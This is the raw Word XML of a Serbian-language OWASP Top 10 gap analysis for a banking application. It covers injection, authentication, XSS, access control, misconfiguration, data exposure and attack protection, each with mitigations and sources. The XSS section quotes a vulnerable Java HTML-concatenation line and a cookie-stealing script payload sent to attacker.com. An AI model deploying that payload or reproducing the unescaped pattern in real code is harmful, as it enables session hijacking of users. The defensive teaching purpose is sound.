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4E" w:rsidRPr="00E80E4E" w:rsidRDefault="00E80E4E" w:rsidP="00E80E4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0E4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OWASP Top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10 -</w:t>
      </w:r>
      <w:r w:rsidRPr="00E80E4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gap analiza</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E80E4E" w:rsidRDefault="00E80E4E" w:rsidP="00E8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E80E4E" w:rsidRPr="00B83C64" w:rsidRDefault="00E80E4E" w:rsidP="00E8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3C64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A1 - Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0049289D" w:rsidRDefault="00450AFB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Napadač ubacuje("injektuje") neželjeni kod u bazu i tako biva zaražena. On tada može videti razne podatke koje nije smeo. Napadač može biti interni korisnik, eksterni korisnik ili administrator.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Osim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što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vidi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napadač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AFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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briše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naš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projekat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važni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injection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xml parser injection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C1D1F" w:rsidRDefault="005C1D1F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Najlakši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način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proverimo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ranjivi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stvari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proverimo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naš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testiranjem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provera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sigurnija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efikasnija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Verzije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ranjive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5.0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više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450AFB" w:rsidRDefault="005C1D1F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Pošto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koristimo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ranjivu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bazu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moramo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zaštititi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Koristimo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siguran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API.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koristimo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"white list input validation". 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Što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tiče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xml parser injection-a,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tu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napadaču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ne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smemo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dozvoliti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nam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podmetne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neki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xml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dokument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tako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ubaci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nešto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u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nasu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bazu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primer. To se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sprečitii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tako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što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proverava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unošenje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xml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metakaraktera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Neki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od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njih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su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461F3" w:rsidRPr="00C461F3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 , </w:t>
      </w:r>
      <w:r w:rsidR="00C461F3" w:rsidRPr="00C461F3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="00C46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461F3" w:rsidRPr="00C46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 </w:t>
      </w:r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461F3" w:rsidRPr="00C46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="00C46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C461F3" w:rsidRPr="00C461F3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r w:rsidR="00C461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itd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C461F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461F3" w:rsidRDefault="00C461F3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Pomoćni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izvori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C461F3" w:rsidRDefault="00C461F3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61F3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https://www.owasp.org/index.php/Top_10_2017-A1-Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C461F3" w:rsidRDefault="00C461F3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61F3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https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C461F3" w:rsidRDefault="00C461F3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61F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://stackoverflow.com/questions/60174/how-can-i-prevent-sql-injection-in-php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C461F3" w:rsidRDefault="00C461F3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61F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.w3schools.com/sql/sql_injection.asp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C461F3" w:rsidRDefault="00C461F3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61F3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https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRDefault="00B83C64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C64" w:rsidRPr="00B83C64" w:rsidRDefault="00B83C64" w:rsidP="00B83C64">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B83C64">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A2 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00B83C64">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Broken Authentication and Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83C64" w:rsidRDefault="006F3380" w:rsidP="0045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Napadač, a on može biti i čovek izvan sistema a takođe i korisnik sistema, koristi greške u autentifiikaciji i sešn menadzmentu (dolazi do šifre ili sešn ID-a, itd) i tako privremeno ili za stalno krade naloge, menja ili ih briše.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3380" w:rsidRDefault="006F3380" w:rsidP="00450AFB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Programeri često koriste šeme za pravljenje ovakvih stvari, što olakšava napadaču da ako zna slabost nekog odredjenog dela lakše udje i u naš sistem. Najviše pažnje treba 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usmerimo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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>logout</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3380">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>promeni</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F3380">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>-a</w:t>
      </w:r>
      <w:r w:rsidRPr="006F3380">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">, forgot password, timeouts, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>zapamti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3380">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> me, secret question, account update, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>itd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Pronalaženje</w:t>
      </w:r>
      <w:proofErr w:type="spell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je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teško</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006F3380" w:rsidRDefault="006F3380" w:rsidP="00450A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6F3380">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Jednom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uspe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ukrade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nalog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raditi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vlasnik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naloga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česte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mete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napada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privilegovani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nalozi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380">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>administratora</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F3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tome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određeni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indetitet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gubitka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A567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zaboravimo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gubitak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ugleda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štete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prouzrokovati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našoj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firmi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iko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išao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našu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banku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ovakav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napad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73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>završio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008A5673">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A5673" w:rsidRDefault="008A567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5673">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Neke od najvećih "rupa", tj ako se ovo ne odradi kako treba: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A5673" w:rsidRDefault="008A5673" w:rsidP="008A56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Kredencijali nisu dobroskladišteni, nisu dobro kriptovani ili heširani.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A5673" w:rsidRDefault="008A5673" w:rsidP="008A56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Session ID dostupni u URL-u.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A5673" w:rsidRDefault="008A5673" w:rsidP="008A56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Session ID nema timeout. Ovo je veoma bitno za naš sistem, budući da pravimo banku.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008A5673" w:rsidRDefault="008A5673" w:rsidP="008A56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itd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="008A567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Neka od rešenja se nalaze u OWASP ASVS (</w:t>
      </w:r>
      <w:r w:rsidRPr="008A5673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https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project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). Takođe se moramo zaštititi od XSS grešeaka koje mogu dovesti do </w:t>
      </w:r>
      <w:r w:rsidR="00A834D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kradje sešn ID-a.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="00A834D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Neki od osnovnih vrsta zaštite su i oni koje mi koristimo, a to su da tražimo određenu kompleksnost u postavljanju šifre, postavljamo timeout sistem, dozvoljen samo određen broj pokušaja logovanja itd. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="00A834D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Izvori:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="00A834D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4D3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https://www.owasp.org/index.php/Top_10_2017-A2-Broken_Authentication_and_Session_Management</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="00A834D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4D3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https://www.owasp.org/index.php/Authentication_Cheat_Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A834D3" w:rsidRDefault="00A834D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34D3" w:rsidRDefault="00A834D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34D3" w:rsidRDefault="00A834D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34D3" w:rsidRDefault="00A834D3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A3 - Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75C4E" w:rsidRDefault="00A834D3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zasniva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tome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napadač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šalje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tekstualnu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skriptu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tako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napada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Napad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odnositi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skoro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sve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delove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sistema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, pa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čak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bazu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podataka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. On se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dešava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kada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aplikacija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treba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apdejtuje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stranicu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deliti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"stored"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"reflected"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napad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. E sad,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svaki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od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njih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opet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podeliti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serverski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klijentski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Serverski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dosta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lakše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uočiti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prvenstveno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code-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analizom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testiranjem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dok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kod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klijentskog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mnogo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teže</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E75C4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75C4E" w:rsidRDefault="00E75C4E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Naš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poslovna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posebno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ranjiv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naša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aplikacija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uzima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vraća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određene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zavisnosti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unetih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a to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savršeno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mesto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ovakav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to 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izvesti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ovako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E75C4E" w:rsidRDefault="00E75C4E" w:rsidP="00E75C4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>String) page += "&lt;input name='</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>creditcard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>' type='TEXT'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">value='" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>request.getParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">("CC") + "'&gt;"; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75C4E" w:rsidRDefault="00E75C4E" w:rsidP="00E75C4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Napadač</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>modifikuje</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ‘CC’ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parametar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">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brauzeru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: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75C4E" w:rsidRDefault="00E75C4E" w:rsidP="00E75C4E">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="E0E0E0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>'&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>document.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
        <w:t>'http://www.attacker.com/cgi-bin/cookie.cgi?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>foo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>='+</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/script&gt;'. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E75C4E" w:rsidRDefault="00463C9E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Naša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greška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vršimo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validaciju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escaping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463C9E" w:rsidRDefault="00463C9E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zaštitili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serverskoj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strani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eskejpovali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nepoverljive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klijentskoj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izbegavali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prebacivanje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nepoverljivih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 JavaScript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druge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API-je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našeg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brauzera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63C9E" w:rsidRDefault="00463C9E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Izvori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463C9E" w:rsidRDefault="00463C9E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3C9E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https://www.owasp.org/index.php/Top_10_2017-A3-Cross-Site_Scripting_(XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463C9E" w:rsidRDefault="00463C9E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3C9E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https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)#Stored_and_Reflected_XSS_Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00463C9E" w:rsidRDefault="00463C9E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3C9E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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB02E5" w:rsidRDefault="00BB02E5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B02E5" w:rsidRDefault="00BB02E5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B02E5" w:rsidRDefault="00BB02E5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B02E5" w:rsidRDefault="00BB02E5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B02E5" w:rsidRDefault="00BB02E5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B02E5" w:rsidRDefault="00BB02E5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A4 - Broken Access Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE260D" w:rsidRDefault="00CE260D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Korisnici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nemaju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pristup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odredjenim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resursima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 bi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trebali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imaju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pristup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uspevaju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dodju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njih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Ozbiljan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propust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dovesti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do toga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neautorizovana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brišu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pitanju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poslovna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takve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stvari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smeju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događaju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nipošto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E260D" w:rsidRDefault="00CE260D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greške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doći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onim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delovima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kojima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prvo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znati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tip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trenutno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aplikaciju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pa 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zavisnosti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omogućiti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određene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E260D" w:rsidRDefault="00CE260D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sprečiti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greške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uvodimo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permisije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određenom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dajmo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tačno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određene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funkcionalnos</w:t>
      </w:r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ti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve">. Ali to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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nije</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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dovoljno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> pa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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svemu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pret</w:t>
      </w:r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hoditi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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kvalitetno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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odradjena</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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autentifikacija</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F105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8F1059" w:rsidRDefault="008F1059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Izvori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F1059" w:rsidRDefault="008F1059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1059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https://www.owasp.org/index.php/Top_10_2017-A4-Broken_Access_Control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1059" w:rsidRDefault="008F1059" w:rsidP="00A83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1059">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://www.upenn.edu/computing/security/swat/SWAT_Top_Ten_A2.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008F1059" w:rsidRDefault="008F1059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A5 - Security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Misconfiguration</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Security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misconfiguration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dogoditi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bilo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nivou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Problem je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napadač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ukrade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ubaci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polako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znamo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dešava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A recovery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veoma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skup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Najvažnije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proveriti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bilo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softvera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"out of date". Pod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softvera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smatramo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OS,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Servere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API-je,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Biblioteke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proveravamo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imamo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nepotrebnih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fičera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difolt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naloga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lozinki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8F1059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Najbolja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zaštita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komponente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aplikacije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dobro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razdvojene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samostalne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dobro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podešen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automatizovani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proces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verifikacije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konfiguracije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Izvor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646F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https://www.owasp.org/index.php/Top_10_2017-A5-Security_Misconfiguration</w:t>
      </w:r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9646F" w:rsidRDefault="00F9646F" w:rsidP="008F1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9646F" w:rsidRDefault="00F9646F" w:rsidP="00F96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A6 - </w:t>
      </w:r>
      <w:r w:rsidR="002A772D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A772D" w:rsidRDefault="00E66C9A" w:rsidP="00F96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Tipični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vrste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napadač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ukrade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ključeve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glumi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middle-man-a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kradu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procesu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slanja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primanja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korisnikovog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brauzera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Najveći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propust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u tom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slučaju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napravimo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nismo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kriptovali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osetljive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Ili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imamo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slab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heširanja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preslabe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lozinke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napadač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razotkrije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66C9A" w:rsidRDefault="00E66C9A" w:rsidP="00F96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imamo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osetljivih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npr.lični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podaci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korisniku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njegovo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finansijsko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kartice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itd.moramo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posebno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obratiti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pažnju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napade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zaštitili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njih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E66C9A" w:rsidRDefault="00E66C9A" w:rsidP="00E66C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Kriptovali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osetljive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podatke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CA45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66C9A" w:rsidRDefault="00CA4554" w:rsidP="00E66C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Lozinke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skladištimo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pomoć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posebno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osmišljenih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postupak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(PBKDF2,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bcrypt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...).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA4554" w:rsidRDefault="00CA4554" w:rsidP="00E66C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Naravno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onemogućili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autocomplete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onus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ovih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A4554" w:rsidRDefault="00CA4554" w:rsidP="00CA45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 HTTPS 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komunikaciji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A4554" w:rsidRDefault="00CA4554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Izvori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CA4554" w:rsidRDefault="00CA4554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4554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.owasp.org/index.php/Top_10_2017-A6-Sensitive_Data_Exposure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA4554" w:rsidRDefault="00CA4554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4554">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.detectify.com/2016/07/01/owasp-top-10-sensitive-data-exposure-6/</w:t>
      </w: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3BAD" w:rsidRDefault="00743BAD" w:rsidP="00743BAD">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00743BAD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>A7</w:t>
      </w:r>
      <w:r w:rsidR="008155A1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00743BAD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="008155A1">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00743BAD">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:lang/>
        </w:rPr>
        <w:t>Insufficient Attack Protection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743BAD" w:rsidRDefault="00743BAD" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00743BAD" w:rsidRDefault="00636123" w:rsidP="00743BAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Napadač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konstantno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pokušava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da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nađe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rupu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> u </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>našem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sisitemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r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vrši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napad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za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napadom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>Sistem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uglavnom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vidi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netačno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unešen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podatak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samo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve"> ne </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t>dozvoli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unos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009A4509">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
